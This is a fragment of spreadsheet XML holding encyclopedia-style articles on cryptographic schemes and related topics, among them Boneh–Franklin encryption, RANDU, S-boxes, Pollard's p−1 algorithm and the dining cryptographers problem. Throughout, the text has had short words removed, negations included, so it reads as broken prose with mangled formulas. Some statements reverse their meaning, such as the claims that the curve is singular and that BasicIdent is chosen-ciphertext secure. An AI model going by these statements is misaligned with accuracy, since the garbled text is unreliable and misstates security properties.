    <t>boneh–franklin scheme identity-based encryption system proposed boneh matthew franklin 2001. this article refers protocol version called basicident. application pairings (weil pairing) elliptic curves finite fields. groups parameters scheme bases upon pairings, computations performed groups, {\displaystyle \textstyle g_{1}} {\displaystyle \textstyle g_{2}} {\displaystyle \textstyle g_{1}} {\displaystyle \textstyle prime, {\displaystyle \textstyle p\equiv 2\mod consider elliptic curve {\displaystyle \textstyle e:y^{2}=x^{3}+1} {\displaystyle \textstyle \mathbb /p\mathbb note curve singular {\displaystyle \textstyle 4a^{3}+27b^{2}=27=3^{3}} equals {\displaystyle \textstyle case {\displaystyle \textstyle p=3} excluded additional constraint. {\displaystyle \textstyle q&gt;3} prime factor {\displaystyle \textstyle p+1} (which order {\displaystyle \textstyle find point {\displaystyle \textstyle p\in order {\displaystyle \textstyle {\displaystyle \textstyle g_{1}} points generated {\displaystyle \textstyle {\displaystyle \textstyle \left\{np\|n\in \left\{0,\ldots ,q-1\right\}\right\}} {\displaystyle \textstyle g_{2}} subgroup order {\displaystyle \textstyle {\displaystyle \textstyle gf\left(p^{2}\right)^{*}} need construct group explicitly (this done pairing) thus find generator. protocol description setup public generator (pkg) chooses: public groups {\displaystyle \textstyle g_{1}} (with generator {\displaystyle \textstyle {\displaystyle \textstyle g_{2}} stated above, size {\displaystyle \textstyle depending security parameter {\displaystyle \textstyle corresponding pairing {\displaystyle \textstyle random private master-key {\displaystyle \textstyle k_{m}=s\in \mathbb _{q}^{*}} public {\displaystyle \textstyle k_{pub}=sp} public hash function {\displaystyle \textstyle h_{1}:\left\{0,1\right\}^{*}\rightarrow g_{1}^{*}} public hash function {\displaystyle \textstyle h_{2}:g_{2}\rightarrow \left\{0,1\right\}^{n}} fixed {\displaystyle \textstyle message space cipher space {\displaystyle \textstyle {\mathcal {m}}=\left\{0,1\right\}^{n},{\mathcal {c}}=g_{1}^{*}\times \left\{0,1\right\}^{n}} extraction create public {\displaystyle \textstyle id\in \left\{0,1\right\}^{*}} computes {\displaystyle \textstyle q_{id}=h_{1}\left(id\right)} private {\displaystyle \textstyle d_{id}=sq_{id}} given user. encryption given {\displaystyle \textstyle m\in {\mathcal {m}}} ciphertext {\displaystyle \textstyle obtained follows: {\displaystyle \textstyle q_{id}=h_{1}\left(id\right)\in g_{1}^{*}} choose random {\displaystyle \textstyle r\in \mathbb _{q}^{*}} compute {\displaystyle \textstyle g_{id}=e\left(q_{id},k_{pub}\right)\in g_{2}} {\displaystyle \textstyle c=\left(rp,m\oplus h_{2}\left(g_{id}^{r}\right)\right)} .note {\displaystyle \textstyle k_{pub}} pkg's public thus independent recipient's decryption given {\displaystyle \textstyle c=\left(u,v\right)\in {\mathcal {c}}} plaintext retrieved using private key: {\displaystyle \textstyle m=v\oplus h_{2}\left(e\left(d_{id},u\right)\right)} correctness primary step encryption decryption employ pairing {\displaystyle \textstyle h_{2}} generate mask (like symmetric key) xor'ed plaintext. order verify correctness protocol, verify honest sender recipient values here. encrypting entity uses {\displaystyle \textstyle h_{2}\left(g_{id}^{r}\right)} decryption, {\displaystyle \textstyle h_{2}\left(e\left(d_{id},u\right)\right)} applied. properties pairings, follows that: {\displaystyle {\begin{aligned}h_{2}\left(e\left(d_{id},u\right)\right)&amp;=h_{2}\left(e\left(sq_{id},rp\right)\right)\\&amp;=h_{2}\left(e\left(q_{id},p\right)^{rs}\right)\\&amp;=h_{2}\left(e\left(q_{id},sp\right)^{r}\right)\\&amp;=h_{2}\left(e\left(q_{id},k_{pub}\right)^{r}\right)\\&amp;=h_{2}\left(g_{id}^{r}\right)\\\end{aligned}}} security security scheme depends hardness bilinear diffie-hellman problem (bdh) groups used. proved random-oracle model, protocol semantically secure assumption. improvements basicident chosen ciphertext secure. however, universal transformation method fujisaki okamoto allows conversion scheme property called fullident. references external links seminar 'cryptography security banking'/'alternative cryptology', ruhr university bochum p(airing) b(ased) c(ryptography) library, designed lynn</t>
  </si>
  <si>
    <t>RANDU</t>
  </si>
  <si>
    <t>randu linear congruential pseudorandom number generator (lcg) park–miller type, used primarily 1960s 1970s. defined recurrence: 65539 {\displaystyle v_{j+1}=65539\cdot v_{j}\,{\bmod {\,}}2^{31}\,} initial seed number, {\displaystyle v_{0}} number. generates pseudorandom integers {\displaystyle v_{j}} uniformly distributed interval practical applications often mapped pseudorandom rationals {\displaystyle x_{j}} interval formula: {\displaystyle x_{j}={\frac {v_{j}}{2^{31}}}} .ibm's randu widely considered ill-conceived random number generators ever designed, described "truly horrible" donald knuth. fails spectral test badly dimensions greater seen below. reason choosing particular values multiplier modulus 32-bit-integer word size, arithmetic 65539 {\displaystyle 65539} i.e., {\displaystyle ({\text{i.e., }}2^{16}+3)} calculations could done quickly, using bitwise operators hardware, values chosen computational convenience statistical quality. problems multiplier modulus linear congruential generator modulus used generate points dimensional space, points fall {\displaystyle (n!\times m)^{1/n}} parallel hyperplanes. this indicates low-modulus lcgs unsuited high-dimensional monte carlo simulation. 2^31 could 2344 planes, theoretical maximum. much tighter upper bound proved marsaglia paper absolute values coefficients hyperplanes standard form. that hyperplanes form integer etc, maximum number planes |a|+|b|+|c|.now examine values multiplier 65539 modulus chosen randu. consider following calculation every term taken 231. start writing recursive relation {\displaystyle x_{k+2}=(2^{16}+3)x_{k+1}=(2^{16}+3)^{2}x_{k}\,} becomes, expanding quadratic factor: {\displaystyle x_{k+2}=(2^{32}+6\cdot 2^{16}+9)x_{k}=[6\cdot (2^{16}+3)-9]x_{k}\,} 0and allows show correlation three points {\displaystyle x_{k+2}=6x_{k+1}-9x_{k}\,} summing absolute values coefficients, planes becoming planes closer examination shown diagram above. even standards lcgs, shows randu terrible: using randu sampling unit cube sample parallel planes, even close upper limit 2344 planes. result wide randu early 1970s, many results time seen suspicious. this misbehavior already detected 1963 36-bit computer, carefully reimplemented 32-bit system/360. believed widely purged early 1990s still fortran compilers using late 1999. sample output start randu's output period initial seed {\displaystyle v_{0}=1} 65539, 393225, 1769499, 7077969, 26542323, (sequence a096555 oeis) references external links</t>
  </si>
  <si>
    <t>S-box</t>
  </si>
  <si>
    <t>cryptography, s-box (substitution-box) basic component symmetric algorithms performs substitution. block ciphers, typically used obscure relationship ciphertext, thus ensuring shannon's property confusion. mathematically, s-box vectorial boolean function.in general, s-box takes number input bits, transforms number output bits, necessarily equal s-box implemented lookup table words bits each. fixed tables normally used, data encryption standard (des), ciphers tables generated dynamically (e.g. blowfish twofish encryption algorithms). example good example fixed table s-box (s5), mapping 6-bit input 4-bit output: given 6-bit input, 4-bit output found selecting using outer bits (the first last bits), column using inner four bits. example, input "011011" outer bits "01" inner bits "1101"; corresponding output would "1001".the eight s-boxes subject intense study many years concern backdoor vulnerability known designers) might planted cipher. s-box design criteria eventually published coppersmith 1994) public rediscovery differential cryptanalysis, showing carefully tuned increase resistance specific attack. biham shamir found even small modifications s-box could significantly weaken des. analysis properties there great deal research design good s-boxes, much understood block ciphers released.any s-box linear combination output bits produced bent function input bits termed perfect s-box.s-boxes analyzed using linear cryptanalysis differential cryptanalysis form linear approximation table (lat) walsh transform difference distribution table (ddt) autocorrelation table spectrum. strength summarized nonlinearity (bent, almost bent) differential uniformity (perfectly nonlinear, almost perfectly nonlinear). also bijection, injection surjection boolean function nothing-up-my-sleeve number permutation (p-box) permutation cipher rijndael s-box substitution cipher references further reading kaisa nyberg (1991). perfect nonlinear s-boxes (pdf). advances cryptology eurocrypt '91. brighton. 378–386. retrieved 2007-02-20. coppersmith, (1994). "the data encryption standard (des) strength attacks". journal research development. (3): 243–250. doi:10.1147/rd.383.0243. mister adams (1996). practical s-box design. workshop selected areas cryptography (sac '96) workshop record. queen's university. 61–76. citeseerx 10.1.1.40.7715. schneier, bruce (1996). applied cryptography, second edition. john wiley sons. 296–298, 349. isbn 978-0-471-11709-4.chuck easttom (2018). generalized methodology designing non-linear elements symmetric cryptographic primitives". 2018 ieee annual computing communication workshop conference (ccwc). ieee computing communication workshop conference (ccwc), 2018 ieee annual. ieee. 444–449. doi:10.1109/ccwc.2018.8301643. isbn 978-1-5386-4649-6. s2cid 3659645. external links literature survey s-box design john savard's "questions s-box design" "substitution design based gaussian distribution"</t>
  </si>
  <si>
    <t>P-384</t>
  </si>
  <si>
    <t>p-384 elliptic curve currently specified suite cryptography ecdsa ecdh algorithms. curve characteristic approximately {\displaystyle 394\cdot 10^{113}} binary, given 111...1100...0011...11. that followed followed curve given equation {\displaystyle y^{2}=x^{3}-3x+b} {\displaystyle given certain number. external links fips 186-4 standards curve defined commercial national security algorithm (cnsa) suite factsheet</t>
  </si>
  <si>
    <t>Additive noise mechanisms</t>
  </si>
  <si>
    <t>adding controlled noise predetermined distributions designing differentially private mechanisms. this technique useful designing private mechanisms real-valued functions sensitive data. some commonly used distributions adding noise include laplace gaussian distributions. definitions {\displaystyle {\mathcal {d}}} collection datasets {\displaystyle f:{\mathcal {d}}\to \mathbb real-valued function. sensitivity function, denoted {\displaystyle \delta defined {\displaystyle \delta f=\max |f(x)-f(y)|,} maximum pairs datasets {\displaystyle {\displaystyle {\displaystyle {\mathcal {d}}} differing element. functions higher dimensions, sensitivity usually measured {\displaystyle \ell _{1}} {\displaystyle \ell _{2}} norms. throughout article, {\displaystyle {\mathcal {m}}} used denote randomized algorithm releases sensitive function {\displaystyle {\displaystyle \epsilon {\displaystyle (\epsilon ,\delta differential privacy. mechanisms real-valued functions laplace mechanism introduced dwork al., mechanism adds noise drawn laplace distribution: {\displaystyle {\mathcal {m}}_{\mathrm {lap} }(x,f,\epsilon )=f(x)+\mathrm {lap} \left(\mu =0,b={\frac {\delta f}{\epsilon }}\right),} {\displaystyle expectation laplace distribution {\displaystyle scale parameter. roughly speaking, small-scale noise suffice weak privacy constraint (corresponding large value {\displaystyle \epsilon greater level noise would provide greater degree uncertainty original input (corresponding small value {\displaystyle \epsilon argue mechanism satisfies {\displaystyle \epsilon -differential privacy, suffices show output distribution {\displaystyle {\mathcal {m}}_{\mathrm {lap} }(x,f,\epsilon close multiplicative sense {\displaystyle {\mathcal {m}}_{\mathrm {lap} }(y,f,\epsilon everywhere. first inequality follows triangle inequality second sensitivity bound. similar argument gives lower bound {\displaystyle \exp(-\epsilon discrete variant laplace mechanism, called geometric mechanism, universally utility-maximizing. means prior (such auxiliary information beliefs data distributions) symmetric monotone univariate loss function, expected loss differentially private mechanism matched improved running geometric mechanism followed data-independent post-processing transformation. result also holds minimax (risk-averse) consumers. universal mechanism exists multi-variate loss functions. gaussian mechanism analogous laplace mechanism, gaussian mechanism adds noise drawn gaussian distribution whose variance calibrated according sensitivity privacy parameters. {\displaystyle \delta (0,1)} {\displaystyle \epsilon (0,1)} mechanism defined gauss 1.25 {\displaystyle {\mathcal {m}}_{\text{gauss}}(x,f,\epsilon ,\delta )=f(x)+{\mathcal {n}}\left(\mu =0,\sigma ^{2}={\frac {2\ln(1.25/\delta )\cdot (\delta f)^{2}}{\epsilon ^{2}}}\right)} provides {\displaystyle (\epsilon ,\delta -differential privacy. note that, unlike laplace mechanism, gauss {\displaystyle {\mathcal {m}}_{\text{gauss}}} satisfies {\displaystyle (\epsilon ,\delta -differential privacy {\displaystyle \epsilon prove sufficient show that, probability least {\displaystyle 1-\delta distribution gauss {\displaystyle {\mathcal {m}}_{\text{gauss}}(x,f,\epsilon ,\delta close gauss {\displaystyle {\mathcal {m}}_{\text{gauss}}(y,f,\epsilon ,\delta proof little involved (see appendix dwork roth). mechanisms high dimensional functions high dimensional functions form {\displaystyle f:{\mathcal {d}}\to \mathbb ^{d}} {\displaystyle d\geq sensitivity {\displaystyle measured {\displaystyle \ell _{1}} {\displaystyle \ell _{2}} norms. equivalent gaussian mechanism satisfies {\displaystyle (\epsilon ,\delta -differential privacy function (still assumption {\displaystyle \epsilon gauss 1.25 {\displaystyle {\mathcal {m}}_{\text{gauss}}(x,f,\epsilon ,\delta )=f(x)+{\mathcal {n}}^{d}\left(\mu =0,\sigma ^{2}={\frac {2\ln(1.25/\delta )\cdot (\delta _{2}f)^{2}}{\epsilon ^{2}}}\right),} {\displaystyle \delta _{2}f} represents sensitivity {\displaystyle {\displaystyle \ell _{2}} norm {\displaystyle {\mathcal {n}}^{d}(0,\sigma ^{2})} represents {\displaystyle -dimensional vector, coordinate noise sampled according {\displaystyle {\mathcal {n}}(0,\sigma ^{2})} independent coordinates (see appendix dwork roth proof). references</t>
  </si>
  <si>
    <t>Take-grant protection model</t>
  </si>
  <si>
    <t>take-grant protection model formal model used field computer security establish disprove safety given computer system follows specific rules. shows even though question safety general undecidable, specific systems decidable linear time. model represents system directed graph, vertices either subjects objects. edges labeled label indicates rights source edge destination. rights occur every instance model: take grant. they play special role graph rewriting rules describing admissible changes graph. there total four rules: take rule allows subject take rights another object (add edge originating subject) grant rule allows subject grant rights another object (add edge terminating subject) create rule allows subject create objects (add vertex edge subject vertex) remove rule allows subject remove rights another object (remove edge originating subject)preconditions {\displaystyle take(o,p,r)} subject right take object right p.preconditions {\displaystyle grant(o,p,r)} subject right grant right p.using rules take-grant protection model, reproduce states system change, respect distribution rights. therefore show rights leak respect given safety model. references lipton, richard snyder, lawrence (1977). linear time algorithm deciding subject security" (pdf). journal acm. (3): 455–464. citeseerx 10.1.1.149.4807. doi:10.1145/322017.322025. bishop, matt (2004). computer security: science. addison-wesley. external links diagram sample problem analysis technical report pcs-tr90-151 (nasa)</t>
  </si>
  <si>
    <t>Blum–Micali algorithm</t>
  </si>
  <si>
    <t>blum–micali algorithm cryptographically secure pseudorandom number generator. algorithm gets security difficulty computing discrete logarithms.let {\displaystyle prime, {\displaystyle primitive root modulo {\displaystyle {\displaystyle x_{0}} seed, {\displaystyle x_{i+1}=g^{x_{i}}\ {\bmod p}}} {\displaystyle output algorithm {\displaystyle x_{i}\leq {\frac {p-1}{2}}} otherwise output this equivalent using {\displaystyle x_{i}} random number. shown {\displaystyle n-c-1} bits {\displaystyle x_{i}} used solving discrete problem infeasible even exponents {\displaystyle bits.in order generator secure, prime number {\displaystyle needs large enough computing discrete logarithms modulo {\displaystyle infeasible. precise, method predicts numbers generated lead algorithm solves discrete logarithm problem prime.there paper discussing possible examples quantum permanent compromise attack blum–micali construction. this attacks illustrate previous attack blum–micali generator extended whole blum–micali construction, including blum blum shub kaliski generators. references external links https://web.archive.org/web/20080216164459/http://crypto.stanford.edu/pbc/notes/crypto/blummicali.xhtml</t>
  </si>
  <si>
    <t>Doubling-oriented Doche–Icart–Kohel curve</t>
  </si>
  <si>
    <t>mathematics, doubling-oriented doche–icart–kohel curve form elliptic curve written. special case weierstrass form also important elliptic-curve cryptography doubling speeds considerably (computing composition 2-isogeny dual). introduced christophe doche, thomas icart, david kohel efficient scalar multiplication isogeny decompositions. definition {\displaystyle field {\displaystyle a\in then, doubling-oriented doche–icart–kohel curve parameter affine coordinates represented {\displaystyle y^{2}=x^{3}+ax^{2}+16ax} equivalently, projective coordinates: {\displaystyle zy^{2}=x^{3}+azx^{2}+16axz^{2},} {\displaystyle x={\frac {x}{z}}} {\displaystyle y={\frac {y}{z}}} notice that, since curve special case weierstrass form, transformations common form elliptic curve (weierstrass form) needed. group interesting analyze group elliptic curve cryptography, defining addition doubling formulas, formulas necessary compute multiples points [n]p (see exponentiation squaring). general, group defined following way: three points lies line zero. property, group laws different every curve shape. case, since curves special cases weierstrass curves, addition standard addition weierstrass curves. hand, double point, standard doubling formula used, would fast. case, neutral element {\displaystyle \theta =(0:1:0)} projective coordinates), {\displaystyle \theta =-\theta then, {\displaystyle p=(x,y)} non-trivial element {\displaystyle p!=o} inverse point addition) –p=(x,-y). addition case, affine coordinates used define addition formula: (x1,y1)+(x2,y2)=(x3,y3) (-x13+(x2-a)x12+(x22+2ax2)x1+(y12-2y2y1+(-x23-ax22+y22)))/(x12-2x2x1+x22) ((-y1+2y2)x13+(-ay1+(-3y2x2+ay2))x12+((3x22+2ax2)y1-2ay2x2)x1+(y13-3y2y12+(-2x23-ax22+3y22)y1+(y2x23+ay2x22-y23)))/(-x13+3x2x12-3x22x1+x23) doubling 2(x1,y1)=(x3,y3) 1/(4y12)x14-8a/y12x12+64a2/y12y3 1/(8y13)x16+((-a2+40a)/(4y13))x14+((ay12+(16a3-640a2))/(4y13))x12+((-4a2y12-512a3)/y13) algorithms examples addition fastest addition following (comparing results given http://hyperelliptic.org/efd/g1p/index.html), cost takes multiplications, squaring addition. y2-y1aa x2-x1cc x1cc x2z3zz3 z32x3 2(aa-f)-az3-d ((a+b)2-aa-cc)(d-x3)-y2zz3 example {\displaystyle k=\mathbb p=(x1,y1)=(2,1), q=(x2,y2)=(1,-1) a=1, aa=4 cc=1 z3=4 zz3=16 x3=-4 y3=336 thus, p+q=(-4:336:4) doubling following algorithm fastest (see following link compare: http://hyperelliptic.org/efd/g1p/index.html), cost takes multiplication, squaring additions. x12b a-a16 y12yy2 2yy2x3 (y1+b)2-yy-x3y3 v(x3+64c+a(yy2-c)) example {\displaystyle k=\mathbb a=1. p=(-1,2), q=[2]p=(x3,y3) given b=-15 yy=4 yy2=8 z3=16 x3=225 v=27 y3=9693 zz3=256 thus, q=(225:9693:16). extended coordinates addition doubling computations fast possible, convenient following representation coordinates: {\displaystyle x,y} represented {\displaystyle x,y,z,zz} satisfying following equations: {\displaystyle x={\frac {x}{z}}} {\displaystyle y={\frac {y}{zz}}} {\displaystyle zz=z^{2}} then, doubling-oriented doche–icart–kohel curve given following equation: {\displaystyle y^{2}=zx^{3}+az^{2}x^{2}+16az^{3}x} case, {\displaystyle p=(x:y:z:zz)} general point inverse {\displaystyle -p=(x:-y:z:zz)} furthermore, points curve satisfy: {\displaystyle (x:y:z:z^{2})=(\lambda x:\lambda ^{2}y:\lambda z:\lambda ^{2}z^{2})} {\displaystyle \lambda nonzero. faster doubling formulas curves mixed-addition formulas introduced doche, icart kohel; nowadays, formulas improved daniel bernstein tanja lange (see link efd). internal link information running-time required specific case, table costs operations elliptic curves notes references christophe doche, thomas icart david kohel (2006). "efficient scalar multiplication isogeny decompositions". public cryptography 2006. lecture notes computer science. vol. 3958. springer berlin heidelberg. 191–206. doi:10.1007/11745853_13. isbn 978-3-540-33851-2.daniel bernstein tanja lange (2008). analysis optimization elliptic-curve single scalar multiplication. isbn 9780821857892. external links http://hyperelliptic.org/efd/g1p/index.html http://www.hyperelliptic.org/efd/g1p/auto-2dik.html</t>
  </si>
  <si>
    <t>Metaballs</t>
  </si>
  <si>
    <t>computer graphics, metaballs organic-looking n-dimensional isosurfaces, characterised ability meld together close proximity create single, contiguous objects. solid modelling, polygon meshes commonly used. certain instances, however, metaballs superior. metaball's "blobby" appearance makes versatile tools, often used model organic objects also create base meshes sculpting.the technique rendering metaballs invented blinn early 1980s model atom interactions carl sagan's 1980 series cosmos. also referred colloquially "jelly effect" motion design community, commonly appearing elements navigations buttons. metaball behavior corresponds mitosis cell biology, chromosomes generate identical copies cell division. definition each metaball defined function dimensions (e.g., three dimensions, {\displaystyle f(x,y,z)} three-dimensional metaballs tend common, two-dimensional implementations popular well). thresholding value also chosen, define solid volume. then, represents whether volume enclosed surface defined {\displaystyle metaballs filled {\displaystyle (x,y,z)} not. implementation typical function chosen metaballs inverse-square law, contribution thresholding function falls bell distance centre metaball increases. three-dimensional case, {\displaystyle f(x,y,z)=1/{\sqrt {(x-x_{0})^{2}+(y-y_{0})^{2}+(z-z_{0})^{2}}}} {\displaystyle (x_{0},y_{0},z_{0})} center metaball. however, division, computationally expensive. reason, approximate polynomial functions typically used.when seeking efficient falloff function, several qualities desired: finite support. function finite support goes zero maximum radius. when evaluating metaball field, points beyond maximum radius sample point ignored. nearest neighbor search ensure adjacent metaballs need evaluated regardless total number field. smoothness. because isosurface result adding fields together, smoothness dependent smoothness falloff curves.the simplest falloff curve satisfies criteria {\displaystyle f(r)=(1/r^{2})^{2},} {\displaystyle distance point. this formulation avoids expensive square root calls. more complicated models gaussian potential constrained finite radius mixture polynomials achieve smoothness. soft object model wyvill brothers provides higher degree smoothness still avoids square roots.a simple generalization metaballs apply falloff curve distance-from-lines distance-from-surfaces. there number ways render metaballs screen. case three dimensional metaballs, common brute force raycasting marching cubes algorithm. metaballs common demo effect 1990s. effect also available xscreensaver module. also nurbs bézier surface references further reading blinn, (july 1982). generalization algebraic surface drawing". transactions graphics. (3): 235–256. doi:10.1145/357306.357310. s2cid 24838292. external links implicit surfaces article paul bourke meta objects article blender wiki metaballs article siggraph website "exploring metaballs isosurfaces 2d", september 2008, stephen whitmore, gamedev.net</t>
  </si>
  <si>
    <t>Threshold cryptosystem</t>
  </si>
  <si>
    <t>threshold cryptosystem, basis field threshold cryptography, cryptosystem protects information encrypting distributing among cluster fault-tolerant computers. message encrypted using public key, corresponding private shared among participating parties. with threshold cryptosystem, order decrypt encrypted message sign message, several parties (more threshold number) must cooperate decryption signature protocol. history perhaps first system complete threshold properties trapdoor function (such rsa) proof security published 1994 alfredo santis, desmedt, yair frankel, moti yung.historically, organizations valuable secrets, certificate authorities, military, governments made technology. earliest implementations done 1990s certco planned deployment original secure electronic transaction. however, october 2012, number large public website password ciphertext compromises, security announced would release software make technology available general public.in march 2019, national institute standards technology (nist) conducted workshop threshold cryptography establish consensus applications, define specifications. july 2020, nist published "roadmap toward criteria threshold schemes cryptographic primitives" nistir 8214a. methodology {\displaystyle number parties. such system called (t,n)-threshold, least parties efficiently decrypt ciphertext, fewer useful information. similarly possible define (t,n)-threshold signature scheme, least parties required creating signature. application common application storage secrets multiple locations prevent capture secret subsequent cryptanalysis system. most often secrets "split" secret material public cryptography digital signature scheme. method primarily enforces decryption signing operation take place threshold secret sharer operates (otherwise operation made). this makes method primary trust sharing mechanism, besides safety storage aspects. derivatives asymmetric cryptography threshold versions encryption signature schemes built many asymmetric cryptographic schemes. natural goal schemes secure original scheme. such threshold versions defined following: damgård–jurik cryptosystem elgamal ecdsa (these used protecting bitcoin wallets) paillier cryptosystem also broadcast encryption distributed generation secret sharing secure multi-party computation shamir's secret sharing threshold (disambiguation) references</t>
  </si>
  <si>
    <t>Distribution ensemble</t>
  </si>
  <si>
    <t>cryptography, distribution ensemble probability ensemble family distributions random variables {\displaystyle x=\{x_{i}\}_{i\in {\displaystyle (countable) index set, {\displaystyle x_{i}} random variable, probability distribution. often {\displaystyle i=\mathbb required {\displaystyle x_{n}} certain property sufficiently large. example, uniform ensemble {\displaystyle u=\{u_{n}\}_{n\in \mathbb distribution ensemble {\displaystyle u_{n}} uniformly distributed strings length fact, many applications probability ensembles implicitly assume probability spaces random variables coincide way, every probability ensemble also stochastic process. also provable security statistically close pseudorandom ensemble computational indistinguishability references goldreich, oded (2001). foundations cryptography: volume basic tools. cambridge university press. isbn 0-521-79172-3. fragments available author's site.</t>
  </si>
  <si>
    <t>TestU01</t>
  </si>
  <si>
    <t>testu01 software library, implemented ansi language, offers collection utilities empirical randomness testing random number generators (rngs). library first introduced 2007 pierre l’ecuyer richard simard université montréal.the library implements several types random number generators, including proposed literature found widely used software. provides general implementations classical statistical tests random number generators, well several others proposed literature, original ones. these tests applied generators predefined library, user-defined generators, streams random numbers stored files. specific tests suites either sequences uniform random numbers [0,1] sequences also available. basic tools plotting vectors points produced generators provided well. history initial battery randomness tests rngs suggested 1969 first edition computer programming donald knuth. knuth's tests supplanted george marsaglia's diehard tests (1996) consisting fifteen different tests. inability modify test parameters tests development testu01 library. features testu01 offers four groups modules analyzing rngs: implementing (pre-programmed) rngs; implementing specific statistical tests; implementing batteries statistical tests; applying tests entire families rngs.when specific test applied sample size produced rng, p-value test usually remain reasonable sample size increases sample size hits say. after that, p-value diverges exponential speed. module allows researcher study interaction specific test structure point sets produced given family rngs. this technique used determine large sample size function generator's period length, generator starts fail test systematically. testu01 offers several batteries tests including "small crush" (which consists tests), "crush" tests), "big crush" (106 tests). specific tests applied battery detailed user's guide. pentium running linux 9.0, simple rng, small crush takes minutes. crush takes hours. crush takes hours. complex rng, times increase factor more. comparison, diehard tests take seconds run. limitations testu01 accepts 32-bit inputs, interprets values range this causes sensitive flaws most-significant bits least significant bits. important test general-purpose generators bit-reversed form, verify suitability applications low-order bits.: generators produce bits output additionally require separate tests high halves.: also randomness tests diehard tests practrand references</t>
  </si>
  <si>
    <t>Pollard's p − 1 algorithm</t>
  </si>
  <si>
    <t>pollard's algorithm number theoretic integer factorization algorithm, invented john pollard 1974. special-purpose algorithm, meaning suitable integers specific types factors; simplest example algebraic-group factorisation algorithm. factors finds ones number preceding factor, powersmooth; essential observation that, working multiplicative group modulo composite number also working multiplicative groups modulo factors. existence algorithm leads concept safe primes, primes times sophie germain prime thus minimally smooth. these primes sometimes construed "safe cryptographic purposes", might unsafe current recommendations cryptographic strong primes (e.g. ansi x9.31), necessary sufficient least large prime factor. most sufficiently large primes strong; prime used cryptographic purposes turns non-strong, much likely malice accident random number generation. this terminology considered obsolete cryptography industry: makes safe primes easy factor non-safe primes, size important factor. base concepts composite integer prime factor fermat's little theorem, know integers coprime positive integers {\displaystyle a^{k(p-1)}\equiv 1{\pmod {p}}} number congruent modulo factor gcd(x divisible factor. idea make exponent large multiple making number many prime factors; generally, take product prime powers less limit start random repeatedly replace {\displaystyle x^{w}{\bmod {n}}} runs prime powers. check stage, prefer, whether gcd(x equal multiple factors possible prime factors divisible small primes, point pollard algorithm gives again. algorithm running time basic algorithm written follows: inputs: composite number output: nontrivial factor failureselect smoothness bound define primes {\displaystyle m=\prod _{{\text{primes}}~q\leq b}q^{\lfloor \log _{q}{b}\rfloor (note: explicitly evaluating necessary) randomly pick coprime (note: actually e.g. odd, always select random selection imperative) compute gcd(am (note: exponentiation done modulo return select larger step return failure select smaller step return failureif step indicates prime factors b-powersmooth. step usually indicates factors b-powersmooth, rare cases could indicate small order modulo additionally, maximum prime factors prime factors rare cases, algorithm fail. running time algorithm log2 larger values make slower, likely produce factor. example want factor number 299. select thus select gcd(am since 299, thus return prime, thus fully factored: choose since algorithm incremental, keep running bound constantly increasing. assume smallest prime factor modelled random number size less dixon's theorem, probability largest factor number less 1)1/ε roughly ε−ε; probability 1/27 value n1/6 yield factorisation. practice, elliptic curve method faster pollard method factors large; running method find quarter 64-bit factors 1/27 96-bit factors. two-stage variant variant basic algorithm sometimes used; instead requiring factors less require factors less remaining factor less after completing first stage, basic algorithm, instead computing primes {\displaystyle m'=\prod _{{\text{primes }}q\leq b_{2}}q^{\lfloor \log _{q}b_{2}\rfloor checking gcd(am' compute primes {\displaystyle q=\prod _{{\text{primes }}q\in (b_{1},b_{2}]}(h^{q}-1)} check gcd(q, produces nontrivial factor before, exponentiations done modulo {q1, successive prime numbers interval (b1, qn−1 difference consecutive prime numbers. since typically even numbers. distribution prime numbers relatively small. suggested hence, values (mod stored table, computed hqn−1⋅hdn, saving need exponentiations. implementations gmp-ecm package includes efficient implementation method. prime95 mprime, official clients great internet mersenne prime search, modified version algorithm eliminate potential candidates. also williams's algorithm references pollard, (1974). "theorems factorization primality testing". proceedings cambridge philosophical society. (3): 521–528. bibcode:1974pcps...76..521p. doi:10.1017/s0305004100049252. montgomery, silverman, (1990). extension factoring algorithm". mathematics computation. (190): 839–854. bibcode:1990macom..54..839m. doi:10.1090/s0025-5718-1990-1011444-3. samuel wagstaff, (2013). factoring. providence, american mathematical society. 138–141. isbn 978-1-4704-1048-3.</t>
  </si>
  <si>
    <t>Dining cryptographers problem</t>
  </si>
  <si>
    <t>cryptography, dining cryptographers problem studies perform secure multi-party computation boolean-xor function. david chaum first proposed problem early 1980s used illustrative example show possible send anonymous messages unconditional sender recipient untraceability. anonymous communication networks based problem often referred dc-nets (where stands "dining cryptographers").despite word dining, dining cryptographers problem unrelated dining philosophers problem. description three cryptographers gather around table dinner. waiter informs meal paid someone, could cryptographers national security agency (nsa). cryptographers respect other's right make anonymous payment, want find whether paid. decide execute two-stage protocol. first stage, every cryptographers establish shared one-bit secret, tossing coin behind menu cryptographers outcome turn cryptographers. suppose, example, coin tossing, cryptographer share secret {\displaystyle share {\displaystyle share {\displaystyle second stage, cryptographer publicly announces bit, meal, exclusive (xor) shared bits hold neighbours, meal, opposite xor.supposing none cryptographers paid, announces {\displaystyle 1\oplus 0=1} announces {\displaystyle 1\oplus 1=0} announces {\displaystyle 0\oplus 1=1} hand, paid, announces {\displaystyle \lnot (1\oplus 0)=0} three public announcements combined reveal answer question. simply computes three bits announced. result implies none cryptographers paid must paid bill). otherwise, cryptographers paid, identity remains unknown cryptographers. david chaum coined term dining cryptographers network, dc-net, protocol. limitations dc-net protocol simple elegant. several limitations, however, solutions explored follow-up research (see references section below). collision cryptographers paid dinner, messages cancel out, final result {\displaystyle this called collision allows participant transmit time using protocol. general case, collision happens long even number participants send messages.disruption malicious cryptographer want group communicate successfully protocol final result useless, simply sending random bits instead correct result xor. this problem occurs original protocol designed without using public technology lacks reliable mechanisms check whether participants honestly follow protocol.complexity protocol requires pairwise shared secret keys participants, problematic many participants. also, though dc-net protocol "unconditionally secure", actually depends assumption "unconditionally secure" channels already exist pairs participants, easy achieve practice.a related anonymous veto network algorithm computes logical several users' inputs, rather logical dc-nets, useful applications logical combining operation naturally suited. history david chaum first thought problem early 1980s. first publication outlines basic underlying ideas his. journal version appeared first issue journal cryptology. generalizations dc-nets readily generalized allow transmissions round, groups larger three participants, arbitrary "alphabets" binary digits described below. transmissions longer messages enable anonymous sender transmit information dc-nets round, group cryptographers simply repeat protocol many times desired create desired number bits worth transmission bandwidth. these repetitions need performed serially. practical dc-net systems, typical pairs participants agree up-front single shared "master" secret, using diffie–hellman exchange example. each participant locally feeds shared master secret pseudorandom number generator, order produce many shared "coin flips" desired allow anonymous sender transmit multiple bits information. larger group sizes protocol generalized group {\displaystyle participants, shared secret common participant. round protocol, participant wants transmit untraceable message group, invert publicly announced bit. participants visualized fully connected graph vertices representing participants edges representing shared secret keys. sparse secret sharing 